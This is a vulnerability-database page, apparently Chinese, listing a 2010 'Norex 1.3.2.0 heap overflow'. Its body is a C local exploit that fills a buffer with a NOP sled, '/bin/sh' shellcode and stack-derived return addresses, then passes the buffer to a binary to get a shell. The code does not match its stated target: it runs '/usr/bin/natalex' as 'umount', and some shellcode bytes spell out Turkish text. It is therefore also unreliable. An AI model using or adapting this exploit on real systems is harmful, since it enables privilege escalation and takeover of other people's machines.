Norex 1.3.2.0 heap overflow

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1050542 漏洞类型
发布时间 2010-06-26 更新时间 2010-06-26
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2010060111
|漏洞详情
漏洞细节尚未披露
|漏洞EXP


# Exploit Title: Norex Argument Heap-Overflow
# Date: 06.22.2010
# Author: SiktirEdenzi aka GoteGELENZI
# Software Link: http://www.muratkaslioglu.com/norex/
# Version: v1.3.2.0
# Tested on: Linux
# CVE :
# Code :


#define PATH_ZEN "/usr/bin/natalex -r"
#define OFFER_SIZE 1024
#define DEFAULT_OFFSET 50

u_long get_esp()
{
  __asm__("movl %esp, %eax");

}

main(int argc, char **argv)
{
  u_char execshell[] =
   "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
   "\xb8\x1b\x56\x34\x12\x62\x1f\x74\x1f\x6e\x20\x62\x65\x79\x61\x7a"
   "\x20\x1f\x61\x70\x6b\x61\x6c\x61\x72\x20\x61\x6e\x61\x6e\x1f\x7a"
   "\x1f\x20\x73\x69\x6b\x65\x6e\x7a\x69\x2c\x20\x68\x75\x7a\x65\x79"
   "\x66\x65\x20\x73\x65\x6c\x61\x6d\x6c\x61\x72\x20\x64\x6f\x73\x74"
   "\x75\x6d\x20\x6c\x6f\x6c\x27\x64\x35\x10\x56\x34\x12\x8d\x4e\x0b"
   "\x8b\xd1\xcd"
   "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";

   char *buff = NULL;
   unsigned long *addr_ptr = NULL;
   char *ptr = NULL;

   int i;
   int ofs = DEFAULT_OFFSET;

   buff = malloc(4096);
   if(!buff)
   {
      printf("can't allocate memory\n");
      exit(0);
   }
   ptr = buff;


   memset(ptr, 0x90, OFFER_SIZE-strlen(execshell));
   ptr += OFFER_SIZE-strlen(execshell);



   for(i=0;i < strlen(execshell);i++)
      *(ptr++) = execshell[i];

   addr_ptr = (long *)ptr;
   for(i=0;i < (8/4);i++)
      *(addr_ptr++) = get_esp() + ofs;
   ptr = (char *)addr_ptr;
   *ptr = 0;

   (void)alarm((u_int)0);
   execl(PATH_ZEN, "umount", buff, NULL);
}